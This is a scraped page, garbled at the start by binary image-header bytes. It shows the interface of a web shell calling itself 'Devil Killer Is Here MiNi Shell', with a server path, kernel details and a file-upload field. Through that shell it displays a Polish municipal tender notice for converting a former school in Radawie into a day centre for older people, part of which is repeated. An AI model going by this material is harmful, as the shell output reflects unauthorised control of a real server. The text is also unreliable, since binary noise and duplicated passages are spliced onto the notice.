JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20230227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20230227/0011261301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Adaptacja wraz z termomodernizacją budynku po byłej szkole podstawowej w Radawiu na potrzeby ośrodka dziennego pobytu osób starszych w Gminie Zębowice” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZĘBOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413053</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Izydora Murka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zębowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774216076</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774216076</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@zebowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zebowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Adaptacja wraz z termomodernizacją budynku po byłej szkole podstawowej w Radawiu na potrzeby ośrodka dziennego pobytu osób starszych w Gminie Zębowice” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-108097f4-b6a7-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00112613</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00053139/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Adaptacja wraz z termomodernizacją budynku po byłej szkole podstwowej w Radawiu na potrzeby ośrodka dziennego pobytu dla osób starszych z Gminy Zębowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminazebowice.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminazebowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>	zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej <br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>	włączona obsługa JavaScript;<br/>	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie pdf;<br/>	dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB <br/>w formatach: pdf., excel., doc., zip.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://gminazebowice.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.271.1.01.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakresie prac projektowych<br/> 1) wykonanie dokumentacji projektowej w postaci: <br/> a. projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych; <br/> b. projektów wykonawczych w zakresie, o którym mowa w § 5 Rozporządzenia <br/> Ministra Rozwoju I Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego <br/> zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i <br/> odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z <br/> dnia 29 grudnia 2021 r. Poz. 2454) [dalej też Rozporządzenie]; <br/> c. przedmiaru robót w zakresie, o którym mowa w § 6 Rozporządzenia; <br/> - objętych PFU.<br/> d. uzyskanie pozwoleń na budowę na cały zakres prac projektowych. <br/> 2) Zamawiający dopuszcza możliwość wykonania części zakresów robót budowlanych, <br/> które nie wymagają uzyskania decyzji o pozwoleniu na budowę zgodnie z Ustawą <br/> Prawo Budowlane (w szczególności przyłącze energetyczne oraz ogrodzenie). <br/> − wybudowanie zaprojektowanych sieci i obiektów, <br/> − pełnienie stałego nadzoru autorskiego w trakcie realizacji umowy i w okresie <br/> objętym rękojmią. <br/><br/> 3.2.2. W zakresie wykonania robót budowlanych<br/> W ramach inwestycji przewiduje się przebudowę i termomodernizację budynku po<br/> byłej szkole podstawowej w Radawiu przy ul. Szkolnej 22 na potrzeby placówki <br/> dziennego pobytu dla osób starszych i niepełnosprawnych, którego brak jest w <br/> Gminie Zębowice, a który w związku ze starzejącym się społeczeństwem jest <br/> niezbędny dla poprawy życia wszystkich mieszkańców Gminy Zębowice. W ramach <br/> realizacji inwestycji przewiduje się w szczególności: <br/> - przygotowanie kompleksowej dokumentacji projektowej i technicznej, <br/> - docieplenie budynku (ścian) - wymianę stolarki okiennej i drzwiowej, <br/> - wymianę pokrycia dachowego, <br/> - wymianę źródła ciepła z kotła węglowego na opalany olejem opałowym wraz ze <br/> zbiornikami na olej (zastosowanie nowoczesnego kotła olejowego o wyższej <br/> sprawności i mocy grzewczej przyczyni się do racjonalnego wykorzystania energii <br/> używanej na ogrzewaniu budynku - zmniejszenie zapotrzebowanie na paliwo), <br/> - wymianę instalacji sanitarnej i elektrycznej, <br/> - likwidację barier architektonicznych, <br/> - przebudowę pomieszczeń na zaplecze kuchenne, gospodarcze oraz pomieszczenia dla <br/> seniorów.<br/><br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia zawiera Program Funkcjonalno - Użytkowy wraz z załącznikami (dalej też PFU), który stanowi załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność do występowania w obrocie gospodarczym<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>6.1. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/> wynika to z odrębnych przepisów.<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>6.2.	Sytuacja finansowa lub ekonomiczna<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>6.3.	Zdolność techniczna lub zawodowa<br/><br/>6.3.1.	O wykonanie zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną, zrealizowaną poprzez jej zaprojektowanie i wykonanie, o której mowa w art.103 ust. 2 Pzp (dalej też - zaprojektuj i wybuduj), polegającej w szczególności na: <br/>1)	opracowaniu dokumentacji projektowej w zakresie budowy lub przebudowy budynku wraz ze zmianą sposobu jego użytkowania, to jest budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobku itp., o wartości robót co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2 <br/>w następujących zakresach: <br/>a.	kompleksowa termomodernizacja budynku polegająca na dociepleniu (ścian zewnętrzne, wymianie stolarki okiennej i drzwiowej oraz dociepleniu pokrycia dachowego), <br/>b.	instalacje wodno-kanalizacyjne,<br/>c.	instancje centralnego ogrzewania,<br/>d.	instalacji elektryczne,<br/>e.	instalacji sieci telefonicznej i LAN<br/>2)	wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2; <br/> 3) wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą <br/> sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: <br/> budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz <br/> o powierzchni użytkowej minimum 700 m2.<br/><br/>6.3.1.1. Za spełnienie w/w warunków zamawiający uzna, wykonanie przez wykonawcę <br/> zamówienia publicznego, który zrealizował:<br/>1) w wyniku jednego postępowania, w formacie zaprojektuj i wybuduj, <br/> zamówienie zaprojektowania i wykonania robót budowlanych;<br/>2) w wyniku w dwóch postępowaniach, w formacie zaprojektuj i wybuduj <br/> zamówienia:<br/>a. w jednym dokumentacje projektową,<br/>b. w drugim roboty budowlane.<br/> <br/>6.3.2.	O zamówienie mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania przedmiotu zamówienia, to jest minimum po jednej osobie posiadającej uprawnienia (dopuszcza się aby jedna osoba posiadała więcej niż jedno uprawnienie) <br/>w specjalnościach:<br/><br/>1. do projektowania: <br/>a.	architektonicznej bez ograniczeń, która posiada minimum 5-letnie doświadczenie <br/>w projektowaniu oraz wykonała w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dokumentację projektową w formacie zaprojektuj i wybuduj w zakresie budowy, rozbudowy lub przebudowy w raz ze zmianami sposobu użytkowania istniejącego budynku użyteczności publicznej takiego np. jak: budynek szkoły, przedszkola, żłobka itp. o powierzchni użytkowej minimum 700 m2, w realizacji umowy, której wartość realizacji robót budowlanych wynosiła co najmniej 1.500.000,00 zł, <br/>b.	konstrukcyjno-budowlanej bez ograniczeń, to jest instalacyjnej w zakresie sieci, instalacji i urządzeń, w szczególności: urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>c.	konstrukcyjno-budowlanej bez ograniczeń, to jest instalacyjnej w zakresie w zakresie: sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. <br/>Wszystkie osoby winny posiadać decyzję o nadaniu uprawnień budowlanych oraz być wpisane na listę członków Izby Architektów RP. lub Centralnego Rejestr Osób Posiadających Uprawnienia Budowlane, prowadzonego przez GINB.<br/>2. do wykonania robót budowlanych:<br/>a.	minimum jedna osoba, która będzie pełniła funkcję kierownika budowy, posiadająca uprawnienia budowlane do kierowania robotami budowlanym w specjalności budowlano - konstrukcyjnej bez ograniczeń oraz posiadającą minimum 5-letnie doświadczenie w kierowaniu robotami;<br/>b.	minimum jedna osoba, która będzie pełniła funkcję kierownika robót budowlanych, posiadająca uprawnienia sanitarne bez ograniczeń do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych oraz wodociągowych i kanalizacyjnych oraz posiadająca minimum 5-letnie doświadczenie <br/>w kierowaniu robotami. <br/>c.	minimum jedna osoba, która będzie pełniła funkcję kierownika robót elektrycznych, posiadająca uprawnienia budowlane do kierowania robotami elektrycznymi bez ograniczeń oraz posiadająca minimum 5-letnie doświadczenie w kierowaniu robotami. <br/>Wszystkie osoby winny posiadać decyzję o nadaniu uprawnień budowlanych oraz być wpisane na listę członków PIIB (Polska Izba Inżynierów Budownictwa). <br/><br/>6.5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>6.5.1.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/><br/>6.5.2.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/><br/>6.5.3.	Zobowiązanie podmiotu udostępniającego zasoby, winno potwierdzać, że stosunek łączący wykonawcę z podmiotem udostępniającym zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego je, <br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego <br/>zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących uprawnień, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. (treść oświadczenie stanowi zał. nr 5). <br/><br/>6.5.4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Szczegóły w SWZ.<br/>6.3.1.	O wykonanie zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną, zrealizowaną poprzez jej zaprojektowanie i wykonanie, o której mowa w art.103 ust. 2 Pzp (dalej też - zaprojektuj i wybuduj), polegającej w szczególności na: <br/>1)	opracowaniu dokumentacji projektowej w zakresie budowy lub przebudowy budynku wraz ze zmianą sposobu jego użytkowania, to jest budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobku itp., o wartości robót co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2 <br/>w następujących zakresach: <br/>a.	kompleksowa termomodernizacja budynku polegająca na dociepleniu (ścian zewnętrzne, wymianie stolarki okiennej i drzwiowej oraz dociepleniu pokrycia dachowego), <br/>b.	instalacje wodno-kanalizacyjne,<br/>c.	instancje centralnego ogrzewania,<br/>d.	instalacji elektryczne,<br/>e.	instalacji sieci telefonicznej i LAN<br/>2)	wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz o powierzchni użytkowej minimum 700 m2; <br/> 3) wykonaniu robót budowlanych w zakresie budowy, przebudowy wraz ze zmianą <br/> sposobu użytkowania budynku użyteczności publicznej, w szczególności takiego jak: <br/> budynek szkoły, przedszkola, żłobka itp. o wartości co najmniej 1.500.000,00 zł oraz <br/> o powierzchni użytkowej minimum 700 m2.<br/><br/>6.3.1.1. Za spełnienie w/w warunków zamawiający uzna, wykonanie przez wykonawcę <br/> zamówienia publicznego, który zrealizował:<br/>1) w wyniku jednego postępowania, w formacie zaprojektuj i wybuduj, <br/> zamówienie zaprojektowania i wykonania robót budowlanych;<br/>2) w wyniku w dwóch postępowaniach, w formacie zaprojektuj i wybuduj <br/> zamówienia:<br/>a. w jednym dokumentacje projektową,<br/>b. w drugim roboty budowlane.<br/> <br/>6.3.2.	O zamówienie mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania przedmiotu zamówienia, to jest minimum po jednej osobie posiadającej uprawnienia (dopuszcza się aby jedna osoba posiadała więcej niż jedno uprawnienie) <br/>w specjalnościach:<br/><br/>1. do projektowania: <br/>a.	architektonicznej bez ograniczeń, która posiada minimum 5-letnie doświadczenie <br/>w projektowaniu oraz wykonała w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dokumentację projektową w formacie zaprojektuj i wybuduj w zakresie budowy, rozbudowy lub przebudowy w raz ze zmianami sposobu użytkowania istniejącego budynku użyteczności publicznej takiego np. jak: budynek szkoły, przedszkola, żłobka itp. o powierzchni użytkowej minimum 700 m2, w realizacji umowy, której wartość realizacji robót budowlanych wynosiła co najmniej 1.500.000,00 zł, <br/>b.	konstrukcyjno-budowlanej bez ograniczeń, to jest instalacyjnej w zakresie sieci, instalacji i 